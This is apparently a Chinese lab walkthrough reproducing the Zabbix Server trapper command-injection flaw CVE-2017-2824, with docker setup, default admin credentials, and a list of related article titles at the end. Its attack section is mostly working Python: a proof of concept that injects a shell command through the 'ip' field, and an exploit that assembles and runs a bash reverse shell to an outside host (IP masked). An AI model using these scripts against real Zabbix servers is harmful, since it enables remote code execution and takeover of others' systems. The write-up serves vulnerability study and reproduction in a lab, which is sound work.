文章目录

  • 声明
  • 一、漏洞简介
  • 二、影响范围
  • 三、环境搭建
  • 四、本地实战
    • POC测试
    • 反弹Shell

声明

本篇文章仅用于技术学习与漏洞复现,切勿用于非授权下的渗透测试行为,切记!


一、漏洞简介

Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。

二、影响范围

Zabbix Server 2.4.X 版本

三、环境搭建

Vulfocus:docker pull vulfocus/zabbix-cve_2017_2824:latest

查看本地镜像并运行漏洞环境

docker imagesdocker run -d -P vulfocus/zabbix-cve_2017_2824-d:将镜像挂起后台运行
-P:将镜像需要开启的端口随机映射到这台服务器的公网IP端口上



访问ip:port成功搭建,使用默认管理员账号密码进入后台

用户名:admin密码:Zabbix


接着 在Configuration的选项卡里进入Actions下把Event source选中Auto registration,点击Create action,以管理员的身份去开启自动注册功能



操作完成之后就开启了自动注册功能。

四、本地实战

POC测试

利用链接:https://github.com/listenquiet/cve-2017-2824-reverse-shell

import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)

使用 ls /tmp命令查看是否执行成功

反弹Shell

Exp如下:

import sys
import socket
import json
from time import sleepdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return data# target = "X.X.X.X"
target = sys.argv[1]
num = 1exps = [';echo -n "/bin/bash" > /tmp/1.sh', ';echo -n " -i >& " >> /tmp/1.sh', ';echo -n "/dev/tcp/" >> /tmp/1.sh',';echo -n "X.X." >> /tmp/1.sh', ';echo -n "X.X/" >> /tmp/1.sh', ';echo -n "1234 0>&1" >> /tmp/1.sh',';/bin/bash /tmp/1.sh']
for exp in exps:host = "vulhub" + str(num)print(host)print(send(target, {"request": "active checks", "host": host, "ip": exp}))sleep(1)num += 1for i in range(10000, 10500):data = send(target, {"request": "command", "scriptid": 1, "hostid": str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)


执行:python3 exp.py X.X.X.X

可以看到已经反弹Shell

攻击完成!!!

Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)相关推荐

  1. Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

    漏洞简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统.该系统支持网络监控.服务器监控.云监控和应用监控等. Zabbix SIA zabbix3-prox ...

  2. Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

    漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统.该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位.解决存在的各种问题. Zabb ...

  3. (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞

    (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞 20210508 一.漏洞简介 Zabbix 是由Alexei Vladishev 开发的一种网络监视.管理系 ...

  4. Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁...

    Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级 ...

  5. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

  6. 修改jar 注入_Apache Tika命令注入漏洞挖掘

    介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...

  7. cracer培训教程第一期 文件上传漏洞与命令注入漏洞

    偏向php 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,并让服务器段执行,代码注入的典型代表就是文件包含file inclusion.文件包含可能出现在jsp.php.as ...

  8. 最新系统漏洞--QSAN SANOS命令注入漏洞

    最新系统漏洞2021年10月21日 受影响系统: QSAN SANOS <= 2.0.0 (build 202012222000) 描述: CVE(CAN) ID: CVE-2021-32533 ...

  9. 文件包含和命令注入漏洞

    文件包含和命令注入漏洞 文件包含漏洞 介绍 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,让服务器端执行,代码注入的典型代表就是文件包含file inclusion.文件包含 ...

最新文章

  1. 原创,自己做的一个简单实用的提示小插件,兼容性很好,基本上都兼容!
  2. SmartNIC/DPU — 主流厂商
  3. 示波器输入阻抗匹配问题
  4. Java容器类和包装类
  5. Jquery插件入门之Validate插件的简单使用
  6. PriorityBlockingQueue源码
  7. linux自动挂载fcoe存储,在sdb上挂载USB 设备
  8. python 编辑excel需要什么包_Python 中操作EXCEL表格的包
  9. 博客园代码黑色主题高亮设置
  10. 挨踢部落故事汇(6):女攻城狮职位晋升记
  11. 根据函数名称调用函数
  12. 【模式识别-北理工】02模式识别算法体系
  13. ad18 bell封装,AD元件库中常用元件
  14. node ajax实现登录注册,nodejs实现简易登录注册
  15. 下载docker镜像包
  16. 如何加声调口诀_拼音声调口诀
  17. 搭建代理服务器的完整步骤
  18. 50个MySql语句
  19. 怎么起用计算机无线开关,笔记本无线网络开关,详细教您如何打开笔记本电脑无线网卡开关...
  20. linux安装硬盘超过2t,linux 硬盘超过2T问题

热门文章

  1. 体育直播android,500体育直播
  2. Lab: Password reset poisoning via middleware:通过中间件使密码重置中毒靶场复盘
  3. Cathy Zhang 箭头函数与普通函数的区别
  4. 记一次完整的用户测试
  5. linux系统多网口聚合配置,linux端口聚合
  6. RA病人关节残障与软骨破坏而非骨破坏相关
  7. 冰点文库最新版3210
  8. contest17 CF593 div2 ooxxx ooxxx ooooo
  9. 2021-08-11 WPF控件专题 Frame 控件详解
  10. 用户画像(User Profile)概述